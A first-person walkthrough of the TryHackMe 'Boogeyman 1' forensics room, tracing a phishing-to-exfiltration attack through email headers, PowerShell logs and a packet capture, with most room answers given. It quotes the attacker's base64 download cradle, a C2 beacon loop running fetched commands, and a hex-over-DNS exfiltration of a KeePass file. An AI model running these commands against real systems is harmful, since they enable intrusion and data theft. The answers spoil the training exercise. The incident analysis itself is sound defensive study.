TryHackMe Boogeyman 1 Write-Up!
Hi everyone, this is quite literally my first write-up for a THM machine. Since it is a new room and there are no write-ups yet provided, I decided to write one myself.
So, here is the information about the room in question:
Room Name: Boogeyman1
Official Introduction: In this room, you will be tasked to analyse the Tactics, Techniques, and Procedures (TTPs) executed by a threat group, from obtaining initial access until achieving its objective.
Difficulty: Medium
Date: 14.04.2023
Created By: ar33zy
Room Link: https://tryhackme.com/room/boogeyman1
Introduction
First things first, join the room and read the "Prerequisites" section. If you have not completed the mentioned rooms, I highly recommend completing the following rooms and obtaining their badges, as they will be very helpful for the investigation at hand:
Environment
You will be working on an Ubuntu machine that can be connected over VNC. Deploy the machine as instructed in the room and click the blue "Show Split View" option on the top right of the page. After that, you're good to go.
Tools
You'll be expected to use the following tools, but everyone is different when it comes to problem-solving, so you may wish to use different tools than the ones listed here:
Additional
Let the Hunt Begin!
Task 2 {[Email Analysis] Look at that headers!}
So according to our scenario:
"Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation. The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem like a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyze and assess the impact of the compromise."
What we have here are the artifacts, and this section is all about the email file in hand, so let's prepare it.
First, use the "cat" command to print out the contents and headers of the "dump.eml" file.
I copied it to my computer via the "clipboard" on the slider on the left and created the .eml file locally. Then I uploaded it to PhishTool. You can find the tool at this link: https://www.phishtool.com/.
PhishTool already shows some security errors, but those are not our concern, since we need to focus on the first task at hand.
What is the email address used to send the phishing email?
You'll see that it's from "[email protected]" immediately.
What is the email address of the victim?
Our victim here is "[email protected]."
What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?
To find the answer, you need to go to PhishTool and view the email as "source." This shows you the raw contents of the email again. The trick here is that you can now search through the file more flexibly. So, let's take a look at the DKIM-Signature and the List-Unsubscribe headers.
You'll see the Elastic Email signature clearly in the List-Unsubscribe header. This most likely belongs to the relay service Elastic Email. It's even clearer in the DKIM signatures.
Our answer here is clear: "elasticemail."
What is the name of the file inside the encrypted attachment?
Go to the "Attachments" section in PhishTool, and you'll immediately see the "Invoice_20230103.lnk" attachment.
What is the password of the encrypted attachment?
The answer is in the email, so it's pretty straightforward: "Invoice2023!"
Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?
You will need the lnkparse tool for this one. Open the file on your environment and download the attachment. You know the password from the previous task.
Use the lnkparse tool to reveal the information inside of the .lnk file.
So, our answer is: "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="
And this concludes Task 2. Take note of what you've learned here and move on to the next task.
Tip here:
The decoder argument here is "-enc," and correct me if I'm wrong, but without any argument, it will recognize the encoded part as base64. So, you can also go to CyberChef and decode this command as well, i.e., ".(.n.e.w.-.o.b.j.e.c.t. .n.e.t...w.e.b.c.l.i.e.n.t.)...d.o.w.n.l.o.a.d.s.t.r.i.n.g.(.'.h.t.t.p.:././.f.i.l.e.s...b.p.a.k.c.a.g.i.n.g...x.y.z./.u.p.d.a.t.e.'.)."
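As an added example (not from the original write-up or the room), here is how to decode the payload above in Python instead of CyberChef: PowerShell's -enc flag takes base64 of the script's UTF-16LE bytes, which is why a bare base64 decode shows a dot (a null byte) between every character. The base64 string is the one recovered by lnkparse above; the helper names are my own.

```python
import base64
import re

# Base64 blob recovered with lnkparse from the .lnk Command Line Arguments field (from the write-up).
ENCODED = (
    "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0"
    "ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBp"
    "AGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="
)

# Loose URL pattern for pulling IoCs out of the decoded one-liner (my own helper).
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand (-enc) argument.

    -enc expects base64 of the script's UTF-16LE bytes, so for an ASCII script
    every second byte is 0x00; those nulls are the dots CyberChef shows after a
    bare base64 decode. Decoding as UTF-16LE yields the readable command.
    """
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE, so probably not an -enc payload")
    return raw.decode("utf-16-le")


def null_byte_ratio(blob):
    """Share of 0x00 bytes in the decoded blob; close to 0.5 is the UTF-16LE tell."""
    raw = base64.b64decode(blob, validate=True)
    return raw.count(0) / len(raw)


def extract_urls(command):
    """Return the download/C2 URLs referenced by the decoded command."""
    return URL_RE.findall(command)


if __name__ == "__main__":
    command = decode_encoded_command(ENCODED)
    print(command)
    print("null-byte ratio:", round(null_byte_ratio(ENCODED), 2))
    print("URLs:", extract_urls(command))
```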
Task 3 {[Endpoint Security] Are you sure that’s an invoice?}
So we found that there is a malicious attachment that downloads a PowerShell script from a specific domain. Based on that information, we can take a look at the PowerShell logs at hand. The log file is a really long (I mean long) JSON file. Luckily, we have a handy tool called 'jq'. We can simply format the file to make it more readable.
Determining what is useful here is important. Take a look at the questions. We need to summarize what commands have been executed in PowerShell.
So we can begin to see what happened here. I took the following commands as notes:
-> iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd"
-> $s='cdn.bpakcaging.xyz:8080';$i='8cce49b0-b86459bb-27fe2489';$p='https://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{\"X-38d2-8f49\"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{\"X-38d2-8f49\"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{\"X-38d2-8f49\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}\n
-> iwr https://files.bpakcaging.xyz/sb.exe -outfile sb.exe;pwd
-> "$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = \"167.71.211.113\"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd"
So two things are clear here: two programs have been invoked, called "sb.exe" and "sq3.exe". We can guess why, but for now let's go to the questions.
What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)
Based on the commands used here, you've already answered the question: 'files.bpakcaging.xyz' and 'cdn.bpakcaging.xyz'. Please write them in the answer bar in the described format. Also, please take note that there is a port being used here. Port 8080 will be important for further analysis.
What is the name of the enumeration tool downloaded by the attacker?
We've already seen a tool being downloaded, right? "iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd". If you check what this tool is, you'll see that it is a handy enumeration tool for security checks on a host.
Our answer here is "Seatbelt".
What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.
We will need to trace back a bit here. You see, sq3.exe was used to access a file whose purpose we don't know yet. But the path wasn't given in one place; it was built up across multiple commands.
Luckily, we have a handy tool that comes pre-installed with almost every program in the world. It's called "search" :). A really advanced tool that we all forget exists.
To my amazement, the attacker made a mistake here, which will become clear in later tasks. sq3.exe didn't execute on the first attempt, so the attacker had to run it with the direct path.
So you can trace back the cd commands, or simply figure it out by knowing where the AppData folder is located by default.
Also, we've seen the accessed file with its full path as an argument to sq3.exe.
-> .\\Music\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite \"SELECT * from NOTE limit 100\"
Our answer here is:
"C:\\Users\\j.westcott\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite"
Please also take note that a file named "plum.sqlite" has been accessed; it will be important later on.
What is the software that uses the file in Q3?
Take a look at the command, and the software name is right there: "Microsoft Sticky Notes".
What is the name of the exfiltrated file?
We need to take a look at the PowerShell logs again. Right after that, we'll see a command that reads: "$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = \"167.71.211.113\"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd"
We also took note of that command before. So we know that a file called "protected_data.kdbx" has been exfiltrated from the client. Now there are two potentially sensitive files that have been accessed here.
What type of file uses the .kdbx file extension?
.kdbx is the default extension of the "KeePass" database file.
What is the encoding used during the exfiltration attempt of the sensitive file?
Take a look at the commands again. You'll stumble upon a variable called "$hex".
What is '$hex'? A variable must be assigned first, and you'll see that it has been assigned the result of a function.
I presume that it creates hexadecimal values from the bytes of the file content. We can see that the '$bytes' variable here contains the bytes of the designated file.
And it sends those values to the attacker's domain via "nslookup". Pretty interesting indeed.
So it basically tells nslookup:
Hey, look up this domain: hex line + .bpakcaging.xyz
Our answer here is "hex"
And we also learned the answer to the next question right there.
What is the tool used for exfiltration?
We already learned that it is "nslookup".
Task 4 {[Network Traffic Analysis] They got us. Call the bank immediately!}
So far, we know what data was accessed and exfiltrated from the system, as well as the overall impact of the attack. Now it's time to figure out if the attack was indeed successful.
What software is used by the attacker to host its presumed file/payload server?
So what have we learned so far, besides what happened?
For this task we can start with the IP address, but there are other ways to do it as well. I refer to this command for the IP address in question:
"$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = \"\"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd"
If you use the ip.addr == 167.71.211.113 filter and start analysing the traffic, you'll probably see immediately that it is in almost every header.
Python is a programming language so versatile that it provides a simple HTTP server that can be used for many things, including our answer.
"python"
What?HTTP?method is used by the C2 for the output of the commands executed by the attacker?
Okay, so we know that the attacker is inside the system. If we apply some logic here, we can conclude that they need to send information to the C2 somehow. We also know that if you want to send data to a server, you typically use a POST request (you can use other methods as well, depending on what kind of API you're working with, but that's not the topic here). But let's not jump to conclusions and take a look at the .pcapng file again.
To support my theory, I listed the entire HTTP traffic in Wireshark and searched through it flow by flow. My conclusion was a bit confusing at that point, but only the GET and POST methods were effectively used in the traffic.
Also, if you closely inspect the requests and responses, you can see a little pattern there.
First, we have a new IP on the scene, "159.89.205.40", so note it.
Second, the victim sends a GET request to the IP, and the host responds with the command.
But the results of the commands are sent back in POST requests.
I think that is enough for our answer. "POST".
What is the protocol used during the exfiltration activity?
We know what nslookup is for, so the answer is "DNS".
What is the password of the exfiltrated file?
For these two questions I have to give credit to Djalil Ayed for preparing a great walkthrough video for the machine, since I was stuck on this question far longer than I should have been. You can find his work at the link below.
As dictated by the THM rules, I can't show the answers to the last two questions, but I can tell you what I did to get them.
So, if you click on the hint, you'll notice that the answer is in the output of the execution of sq3.exe, right? At this point, we know that GET requests carry the commands and POST requests carry their outputs. So, we can assume that if we see sq3.exe with the correct parameters in a GET request, the matching POST request will give us the output of that command.
The command we need to hunt down is here:
.\Music\sq3.exe AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite "SELECT * from NOTE limit 100"
Or something at least similar to it.
Wireshark has a cool feature that lets you search for strings and other values inside the packets. So, we will do that and search for sq3.exe.
After a quick look, we will find the exact GET request and its response.
Now let's find the POST request that corresponds to it.
What you'll see is not clear-text output. Instead, you'll get encoded data. What you can do, however, is use a handy tool like CyberChef to decode it.
The value is not hexadecimal; it is plain decimal, so use the decimal -> string recipe.
If you figure out what is in the red area, that will be your answer :).
What is the credit card number stored inside the exfiltrated file?
That is a tough one. What we know here is that the attacker sent the .kdbx file via DNS requests. They simply made a separate request for each line, using the name structure below:
"<hex line>.bpakcaging.xyz"
These hex lines are actually the file's bytes encoded as hexadecimal values, so the file was sent as:
"<hex line 1>.bpakcaging.xyz"
"<hex line 2>.bpakcaging.xyz"
"<hex line 3>.bpakcaging.xyz"
...
We also know that they are all DNS requests. So we need all DNS requests that were sent for names under "bpakcaging.xyz".
This is where tshark comes in. Djalil Ayed crafted a command pipeline in his video, and I'll explain here which part produces which result.
tshark -r capture.pcapng -Y 'dns.qry.name matches ".bpakcaging.xyz$" && ip.dst == 167.71.211.113' -T fields -e dns.qry.name | grep -v eu-west | sed 's/.bpakcaging.xyz//g' > protected.bin
--> tshark -r capture.pcapng -Y 'dns.qry.name matches ".bpakcaging.xyz$" && ip.dst == 167.71.211.113' -T fields -e dns.qry.name
The dns.qry.name matches filter performs a regex match for .bpakcaging.xyz$, and ip.dst == 167.71.211.113 keeps only the queries sent to the attacker's IP. The -T fields -e dns.qry.name options print only the queried names instead of the full packet summary.
--> grep -v eu-west
The tshark output still includes some lines we don't need (device-related queries containing "eu-west"), so we use grep's -v parameter to drop them.
--> sed 's/.bpakcaging.xyz//g'
We also don't need anything but the hex lines from the requested domain names, so we strip the domain suffix as well.
--> > protected.bin
This redirects the output into a file named protected.bin, one hex line per DNS query.
At that point, we need to turn that file into the .kdbx file. Djalil Ayed shared a Python script for that, so I'm leaving it here as well:
import binascii

input_filename = "protected.bin"          # hex lines carved out by the tshark pipeline
output_filename = "protected_data.kdbx"  # reconstructed KeePass database

with open(input_filename, "r") as input_file, open(output_filename, "wb") as output_file:
    for line in input_file:
        line = line.strip()
        if not line:
            continue  # skip blank lines
        binary_data = binascii.unhexlify(line)  # each hex line is one chunk of the file
        output_file.write(binary_data)
Run the script in the same directory as your output file (protected.bin); the .kdbx file will be created afterward.
We learned the password of the file, so we can open it. After a little investigation of the file, you'll see an account number that concludes this entire room.
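To tie the Task 3 explanation (hex line + .bpakcaging.xyz) to the reconstruction above, here is an added Python example, not part of the write-up or Djalil Ayed's script, that carves the hex labels out of a list of DNS query names, rebuilds the bytes, and checks for the KeePass 2.x file signature. The query names are constructed sample data; the function names and the 20-byte fake database are my own.

```python
import binascii
import re

# KeePass 2.x files begin with two little-endian signature words
# (0x9AA2D903, 0xB54BFB67); used only to sanity-check the reassembly.
KDBX_MAGIC = bytes.fromhex("03d9a29a67fb4bb5")
HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")


def carve_hex_labels(query_names, exfil_domain):
    """Split DNS query names into (hex_chunks, skipped).

    hex_chunks keeps, in capture order, the leading label of every query under
    exfil_domain that is pure even-length hex (the 'hex line' described above).
    skipped collects labels under the same domain that do not fit, so a
    reviewer can confirm only noise (e.g. ordinary subdomains) was dropped.
    """
    suffix = "." + exfil_domain
    hex_chunks, skipped = [], []
    for name in query_names:
        name = name.rstrip(".")          # tshark may print a trailing dot
        if not name.endswith(suffix):
            continue                     # unrelated domain
        label = name[: -len(suffix)]
        if HEX_LABEL.match(label) and len(label) % 2 == 0:
            hex_chunks.append(label)
        else:
            skipped.append(label)
    return hex_chunks, skipped


def reassemble(query_names, exfil_domain):
    """Rebuild the exfiltrated bytes from the hex labels, in capture order."""
    chunks, _ = carve_hex_labels(query_names, exfil_domain)
    return b"".join(binascii.unhexlify(c) for c in chunks)


def looks_like_kdbx(data):
    """True if the rebuilt file carries the KeePass 2.x signature."""
    return data[:8] == KDBX_MAGIC


# Constructed sample: a fake 20-byte 'database' (KDBX magic + filler) sent as
# two hex labels, interleaved with unrelated queries a real capture would contain.
SAMPLE_FILE = KDBX_MAGIC + b"constructed!"
_hex = SAMPLE_FILE.hex()
SAMPLE_QUERIES = [
    "cdn.bpakcaging.xyz",                  # C2 host from the logs, not exfil data
    _hex[:16] + ".bpakcaging.xyz",         # first 8 bytes
    "eu-west-1.compute.example.net",       # unrelated noise, different domain
    _hex[16:] + ".bpakcaging.xyz.",        # remaining 12 bytes, trailing dot
]

if __name__ == "__main__":
    data = reassemble(SAMPLE_QUERIES, "bpakcaging.xyz")
    print(len(data), "bytes recovered, KDBX signature:", looks_like_kdbx(data))
```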
Conclusion
I personally found the room challenging. I ran into a lot of rabbit holes during the investigation and never hesitated to jump into them. Eventually, a simple fact needed to be remembered for this room: always follow the path of what you have found, and never overcomplicate the problem at hand.
Thanks to ar33zy for creating this room.